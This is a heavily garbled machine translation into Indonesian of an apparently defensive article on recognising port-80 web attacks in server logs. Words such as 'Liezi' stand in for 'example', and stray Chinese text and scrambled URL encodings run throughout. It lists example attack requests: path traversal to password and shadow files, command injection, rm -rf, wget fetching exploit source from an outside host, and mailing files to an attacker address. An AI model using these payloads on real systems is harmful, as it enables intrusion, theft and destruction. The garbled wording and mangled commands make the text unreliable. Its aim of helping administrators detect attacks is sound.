I. Ringkasan
II. Sebuah penjelasan rinci tentang
III. Selanjutnya
IV. Analisis spillover
V. Transcoding
VI. Kesimpulan
[Abstrak]
situs web 80 sebagai port layanan default, pada rilis atas berbagai masalah keamanan menjaga beberapa dari kerentanan memungkinkan penyerang untuk mendapatkan bahkan izin administrator sistem untuk masuk ke situs itu sendiri, berikut ini adalah Zenomorph port 80 serangan pada beberapa jejak penelitian, dan memberitahu Anda bagaimana menemukan masalah dari catatan log.
[Detail]
Di sini, di bagian melalui sejumlah tampilan Liezi pada web server dan aplikasi pada serangan umum, dan bekas, yang merupakan serangan besar hanya Liezi, tidak ada daftar semua bentuk serangan, bagian ini akan deskripsi rinci peran masing-masing serangan, dan dengan cara memanfaatkan kelemahan ini untuk menyerang.
(1) "" ". .." Dan permintaan "..."
Jejak-jejak serangan-serangan ini sangat umum untuk aplikasi web dan web server, yang digunakan untuk memungkinkan seorang penyerang atau program cacing-virus untuk mengubah jalur server web, untuk memperoleh akses ke daerah-daerah tertutup. Kebanyakan program CGI dengan kekurangan, ".." permintaan.
Contoh:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Hal ini menunjukkan permohonan penyerang Liezi mosd file ini, jika kemampuan penyerang terobosan web server direktori root, kemudian memperoleh informasi lebih lanjut dan untuk mendapatkan hak lebih lanjut.
(2) "% 20" permintaan
20% merupakan ruang 16 adalah nilai hex, meskipun ini tidak berarti bahwa Anda dapat menggunakan apa-apa, tetapi Anda melihat waktu log menemukannya, 服务器 上 一些 menjalankan aplikasi web untuk karakter ini dapat diimplementasikan secara efektif Oleh karena itu, Anda harus hati-hati meninjau log. Pada sisi lain, permintaan tersebut kadang dapat membantu untuk melakukan beberapa perintah.
Contoh:
http://host/cgi-bin/lame.cgi?page=ls% | 20-al
Liezi ini menunjukkan penyerang untuk menjalankan perintah unix, daftar katalog seluruh dokumen yang diminta, menyebabkan penyerang untuk mengakses file penting di sistem anda, untuk membantu dia untuk lebih memberikan kondisi untuk mendapatkan hak istimewa.
(3) "% 00" permintaan
00% mengatakan heksadesimal 16-byte kosong, ia mampu untuk menipu aplikasi web, dan permintaan berbagai jenis file.
Contoh:
http://host/cgi-bin/lame.cgi?page=index.html
Hal ini mungkin permintaan yang valid dalam mesin, jika seorang penyerang menyadari permintaan ini berhasil, dia akan terus mencari prosedur cgi.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Mungkin program cgi tidak menerima permintaan ini karena permintaan untuk memeriksa akhiran nama file, seperti: jenis html.shtml atau file lainnya. Kebanyakan program akan memberitahu Anda jenis file yang diminta tidak valid, kali ini akan mengatakan permintaan penyerang file harus karakter dari suatu akhiran jenis file, sehingga penyerang bisa mendapatkan sistem path, nama file, menghasilkan Anda sistem informasi lebih sensitif
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Perhatian untuk permintaan ini, hal itu akan menipu program cgi bahwa dokumen ini adalah untuk menentukan jenis file yang dapat diterima, beberapa aplikasi inspeksi efektif sebagai file permintaan bodoh, yang umum digunakan metode penyerang.
(4) "|" permintaan
Ini adalah karakter pipa, dalam sistem unix, permohonan bantuan dalam pelaksanaan perintah beberapa sistem pada saat yang sama.
Contoh:
# Cat access_log | grep-i ".."
(Perintah ini akan menampilkan log dalam permintaan "" .., biasa digunakan dalam serangan dan cacing ditemukan)
Sering menemukan bahwa banyak aplikasi web menggunakan karakter ini, ini juga menyebabkan alarm palsu dalam log IDS.
Dalam pemeriksaan yang teliti terhadap aplikasi Anda, sehingga mengurangi keuntungan dari laporan yang salah dalam sistem deteksi intrusi.
Berikut adalah beberapa Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Perintah permintaan, berikut ini adalah beberapa perubahan dalam Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%% 20-al | 20/etc
Permohonan ini terdaftar dalam sistem unix / etc direktori dari semua file
% Http://host/cgi-bin/lame.cgi?page=cat 20access_log% grep | 20-i% 20 "lame"
Perintah eksekusi kucing permintaan dan pelaksanaan perintah grep juga akan, periksa "lame"
(5) ";" permintaan
Dalam sistem unix, karakter ini memungkinkan beberapa baris perintah eksekusi
Contoh:
# Id; uname-a
(Order Eksekutif id, diikuti dengan pelaksanaan uname Command)
Beberapa program web dengan karakter ini, dapat mengakibatkan Anda IDS log peringatan kegagalan, Anda harus hati-hati memeriksa program web Anda, sehingga Anda mengurangi risiko kegagalan IDS alert.
(6) " " dan " " Permintaan
Harus memeriksa log record Anda dua karakter, sejumlah alasan, yang pertama adalah karakter yang menambahkan data dalam dokumen
Contoh 1:
# Echo "Anda hax0red H0 H0" / etc / motd (motd tertulis permintaan informasi dalam dokumen tersebut)
Seorang penyerang dapat dengan mudah menggunakan permintaan seperti di atas sabotase dengan halaman web Anda. Seperti penyerang mengeksploitasi RDS terkenal sering digunakan untuk mengubah halaman web.
Contoh 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html Anda akan melihat bahwa bahasa tanda-tanda di sini, ia juga menghabiskan karakter " "," ", serangan tersebut tidak dapat menyebabkan si penyerang untuk mengakses sistem, bingung orang berpikir ini adalah sebuah situs web informasi yang sah (yang mengarah ke Orang kunjungi link ini untuk mengunjungi penyerang untuk mengatur alamat, permintaan ini dapat menjadi 16 karakter dikodekan dalam bentuk hex, sehingga jejak serangan tidak begitu jelas)
(7) "" Permintaan!
Umum Bahasa karakter ini meminta SS (Server Side Termasuk) Saya menyerang, jika penyerang adalah seorang penyerang membingungkan user mengklik link set, dan sama seperti di atas.
Contoh:
http://host1/something.php =
The Lieh-tzu adalah serangan dapat melakukannya untuk membuat situs file dari host1 host2 muncul di atas (tentu saja, perlu pengunjung untuk mengunjungi pengaturan sambungan penyerang. Permohonan ini dapat dikonversi menjadi 16 hex encoding topeng, tidak mudah ditemukan)
Pada saat yang sama, pendekatan ini juga dapat menjalankan perintah otoritas situs web
Contoh:
http://host/something.php =
The Lieh-berjalan di sistem remote "id" perintah, ini akan menampilkan situs web id user, biasanya "tidak ada" atau "www"
Formulir ini juga memungkinkan termasuk file tersembunyi.
Contoh:
http://host/something.php =
File tersembunyi. Htpasswd tidak akan ditampilkan, Apache akan menolak untuk menetapkan peraturan tersebut. Ht bentuk permintaan, dan logo SSI akan memotong pembatasan tersebut, dan menyebabkan masalah keamanan
(8) "," Permintaan
serangan tersebut digunakan untuk mencoba memasukkan remote prosedur aplikasi web PHP, mungkin memungkinkan urutan eksekusi, tergantung pada pengaturan server, dan faktor lain di tempat kerja (seperti php diatur ke mode aman)
Contoh: http://host/something.php = passthru (");? "id
Dalam beberapa aplikasi php sederhana, mungkin ke situs web tentang hak-hak pengguna sistem remote untuk melaksanakan perintah lokal
(9) "` "permintaan
karakter ini kemudian digunakan untuk menjalankan perintah di perl, karakter pada aplikasi web tidak sering digunakan, jadi jika Anda melihatnya di log anda, harus sangat berhati-hati
Contoh:
http://host/something.cgi = `id`
Menulis sebuah program cgi perl tersebut akan mengakibatkan pelaksanaan perintah id
[Lebih lanjut]
Bagian berikut ini akan membahas pelaksanaan serangan lebih bisa perintah, bersama dengan dokumen yang diminta, dan jika Anda memiliki cacat perintah eksekusi jarak jauh, harus bagaimana untuk memeriksa penemuan tersebut. Bagian ini hanya untuk memberikan ide yang baik, dan memberitahu sistem Anda apa yang terjadi, penyerang mencoba untuk menyerang jejak sistem anda, tetapi tidak semua daftar penyerang untuk menggunakan perintah dan permintaan.
"/ Bin / ls"
permintaan Perintah ini seluruh jalan, di banyak aplikasi web jalan ini, jika Anda log di banyak tempat permintaan seperti itu, sangat mungkin untuk kerentanan perintah eksekusi remote besar, tetapi belum tentu masalah juga dapat menjadi alarm palsu. Sekali lagi mengingatkan, aplikasi web tertulis (cgi, asp, php ... dll) adalah dasar dari keamanan
Contoh:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20-al
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Ini adalah jendela shell, jika seorang penyerang untuk mengakses dan menjalankan script ini, Pengaturan Server ketika diijinkan oleh mesin dapat menjadi jendela untuk melakukan sesuatu, Henduo virus worm adalah melalui 80 Duankou, penyebaran mesin remote Dao
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Ini adalah dua file biner, kendala, dan / bin / ls, seperti, jika Anda log di banyak tempat permintaan seperti itu, sangat mungkin untuk kerentanan perintah eksekusi remote besar, tetapi belum tentu masalah mungkin juga alarm palsu.
Ini akan menunjukkan bagian mana yang milik user dan grup
Contoh:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Perintah ini dapat menghapus file tanpa penggunaan yang benar adalah sangat berbahaya
Contoh:
Http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget dan tftp" perintah
Perintah-perintah ini sering penyerang dapat memperoleh hak lebih lanjut untuk men-download file, wget adalah perintah unix di bawah, dapat digunakan untuk men-download backdoors, tftp berada di bawah perintah dan nt unix, digunakan untuk men-download file tersebut. Beberapa cacing IIS menyebar diri dengan tftp untuk menyalin virus ke host lain
Contoh:
Http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi doh = wget% 20http?: / / www.hwa-security.net/Phantasmp.c;
"Cat" perintah
Perintah ini digunakan untuk melihat isi dari file, yang digunakan untuk membaca informasi penting, seperti file konfigurasi, file password, file kredit dan dokumen yang dapat Anda pikirkan
Contoh:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi doh =?% kucing 20/etc/motd;
"Echo" perintah
Perintah ini digunakan untuk menulis data ke file tersebut, seperti "index.html"
Contoh: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwi% 20here 20was%"% 20 | 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwi% 20here 20was%"% 200day.txt 20 %;
"Ps" perintah
Daftar proses sedang berjalan, penyerang yang menceritakan sebuah host remote menjalankan perangkat lunak untuk mendapatkan ide tentang masalah keamanan, untuk mendapatkan hak akses lebih lanjut
Contoh: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% | 20-aux http://host/cgi-bin/bad. cgi doh = ps% 20-aux?;
"Bunuh dan killall" perintah
Dalam sistem unix perintah ini digunakan untuk membunuh proses ini, penyerang bisa menggunakan perintah ini untuk menghentikan layanan sistem dan proses juga bisa menghapus jejak penyerang, beberapa mengeksploitasi akan menghasilkan banyak proses anak
Contoh: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill 20% -9% 200;
"Uname" perintah
Perintah ini memberitahu nama penyerang mesin remote, selama beberapa waktu, melalui website ini untuk mengetahui yang ISP, seorang penyerang yang dapat dikunjungi hari ini. Uname-a untuk meminta normal, ini akan disimpan di log file
Contoh: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-sebuah http://host/cgi-bin/bad |. cgi doh =? uname% 20-a;
"Cc, gcc, perl, python, etc ..." kompilasi / interpretasi dari perintah
Penyerang melalui tftp download wget atau mengeksploitasi, dan menggunakan kompiler, cc gcc untuk mengkompilasi ini ke dalam program dieksekusi, dan hak akses lebih lanjut
Contoh: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Jika Anda melihat log yang ditemukan "python perl" "Ini mungkin instruksi penyerang remote untuk men-download perl, python script, dan mencoba untuk mendapatkan privileges dari lokal
"Mail" perintah
Penyerang sering menggunakan sistem perintah, beberapa dokumen penting ke kotak surat sendiri penyerang, tetapi juga bersedia untuk e-mail adalah serangan bom dilakukan
Contoh:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." dan perintah lain
Sistem Unix untuk memungkinkan mereka untuk mengubah hak akses file
chown = memungkinkan pengaturan pemilik file chmod = memungkinkan untuk mengatur hak akses file chgrp = memungkinkan pemiliknya untuk mengubah akses group pada file chsh = diizinkan untuk mengganti shell pengguna
Contoh:% 20777% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod 20index.html | http://host/cgi-bin/ bad.cgi doh =?% chmod 20.777% 20index.html;%% 20zeno http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20 / etc /% http://host/cgi-bin/bad.cgi?doh=chsh master.passwd | 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. / ... / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" file
Ini adalah password file sistem, biasanya bayangan off, dan tidak memungkinkan untuk melihat kata sandi terenkripsi, tetapi untuk seorang penyerang yang bisa tahu apa yang berlaku pengguna, dan path absolut sistem itu, nama situs dan informasi lainnya, seperti biasanya oleh shadow off, sehingga penyerang biasanya akan melihat file / etc / shadow
"/ Dll / master.passwd"
File ini adalah file password sistem BSD, berisi password terenkripsi, file pada account root hanya read-only, dan beberapa penyerang tidak terampil membuka upayanya untuk membaca isi di dalamnya., Jika situs web hak akses root untuk menjalankan, maka penyerang tersebut, kita dapat membaca isi di dalam, banyak masalah pada sistem administrator akan datang satu demi satu
"/ Etc / shadow"
Berisi password sistem terenkripsi, membaca yang sama pada account root, dan / et / master.passwd hampir
"/ Etc / motd"
Ketika pengguna login ke sistem unix, informasi yang muncul, dalam Pesan "of the Day" file, menyediakan sistem informasi penting dan administrator pengguna seperangkat, pengguna yang ingin melihat mereka yang tidak, juga berisi informasi versi sistem, penyerang biasanya melihat file ini, untuk memahami apa sistem berjalan pada penyerang, langkah berikutnya adalah untuk mencari jenis sistem, mengeksploitasi, dan akses lebih lanjut ke sistem hak
"/ Etc / hosts"
Dokumen ini menyediakan alamat ip dan jaringan informasi, penyerang dapat mempelajari lebih lanjut tentang pengaturan jaringan sistem
"/ Usr / local / apache / conf / httpd.conf"
Ini adalah web server Apache file konfigurasi, penyerang bisa mengerti, seperti cgi, informasi SSI dan lainnya dapat diakses
"/ Etc / inetd.conf"
Ini adalah layanan file konfigurasi inetd, penyerang bisa mempelajari mesin remote, mulai layanan tersebut, apakah akan menggunakan pembungkus untuk kontrol akses, jika bungkus itu ditemukan berjalan, seorang penyerang langkah berikutnya akan memeriksa "/ etc / hosts.allow" dan "/ etc /" hosts.deny, file, dan yang dapat mengubah beberapa pengaturan, hak akses
". Htpasswd,. Htaccess, dan. Htgroup"
File-file ini biasanya digunakan dalam otentikasi pengguna situs web, penyerang akan melihat file ini, dan memperoleh nama pengguna dan password, file password. Htpasswd dienkripsi, istirahat melalui beberapa proses dekripsi sederhana, memungkinkan penyerang untuk mengakses situs kawasan lindung (biasanya pengguna dengan nama pengguna dan sandi yang sama, penyerang bahkan dapat mengunjungi account lainnya)
"Access_log dan error_log"
Ini adalah file log apache server, penyerang sering melihat file ini, melihat permintaan tersebut dicatat, orang-orang dan permintaan lainnya untuk tempat-tempat yang berbeda
Biasanya, penyerang akan memodifikasi file log tersebut, seperti informasi alamat sendiri, penyerang melalui port 80 melalui sistem dan sistem cadangan Anda juga tidak bekerja, tidak ada program catatan catatan status sistem lainnya, yang akan deteksi intrusi menjadi sangat sulit untuk bekerja
"[Drive-surat]: winntrepairsam._ atau [drive-surat]: winntrepairsam"
Windows NT sistem file password, jika perintah remote tidak dapat dilaksanakan, penyerang biasanya akan meminta dokumen-dokumen ini, kemudian "retak l0pht" dari password cracking jenis alat untuk retak, jika penyerang mencoba untuk menyerang file password administrator, jika berhasil maka komputer remote akan penyerang mendapatkan kontrol
[Overflow analisis]
Aku tidak akan bicara terlalu banyak artikel ini pada melimpah dari topik, saya akan memberikan apa yang fenomena dan jejak penting dan perhatian khusus, buffer sering dimanfaatkan untuk menyerang transcoding dan cara-cara lain untuk mencapai sulit untuk menemukan
Berikut ini adalah sederhana Lie Zi
Contoh: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Ini Liezi menunjukkan penyerang pada aplikasi untuk mengirim banyak karakter A, untuk menguji program buffer overflow, buffer overflow bisa mendapatkan izin eksekusi command remote host, jika pemiliknya memiliki setuid dan prosedur untuk root, melalui overflow itu, bisa mendapatkan akses ke seluruh sistem, jika tidak seperti program setuid, kemudian overflow ini hanya dengan menjalankan hak-hak pengguna situs web
Di sini tidak bisa mengatakan semua keadaan, tapi Anda secara teratur harus memeriksa file log anda, jika hari itu tiba-tiba menemukan banyak permintaan, tetapi biasanya tidak lebih dari permintaan, itu berarti Anda mengalami serangan melimpah, tentu saja, mungkin juga Sebuah serangan cacing baru jaringan
[Transcoding]
Semua serangan tersebut di atas permintaan, penyerang biasanya tahu sistem IDS memeriksa permintaan sering mekanik, biasanya penyerang akan menggunakan data alat konversi untuk mengubah format konten yang diminta 16 band, sehingga IDS akan mengabaikan permintaan ini, kita kenal dengan alat pemindaian kerentanan CGI yang merupakan Liezi baik Kumis. Jika Anda melihat log dari waktu menemukan sejumlah besar dari 16-band dan tidak beberapa karakter umum, maka penyerang dapat mencoba menggunakan beberapa cara untuk menyerang sistem Anda
Cara cepat adalah file log permintaan bagi mereka hex 16, salin ke browser anda, browser dapat dikonversi ke dalam permintaan yang tepat, dan ditampilkan isi permintaan, jika Anda tidak keberanian untuk mengambil risiko ini, seorang pria ASCII sederhana, dapat menyediakan Anda dengan kode yang benar.
[Kesimpulan]
Artikel ini tidak dapat mencakup semua 80 port serangan itu, tetapi kebanyakan telah dikutip lebih dari serangan umum, dan memberitahu Anda bagaimana untuk memeriksa file log anda, dan bagaimana untuk menambahkan seperti jumlah peraturan IDS, menulis tujuan-nya adalah web administrator sistem harus peduli tentang apa ide yang baik pada saat yang sama, saya harap artikel ini membantu pengembang web program web untuk menulis program lebih baik
DARI CATATAN: Jika Anda memiliki komentar dan saran, silakan kirim e-mail admin@cgisecurity.com.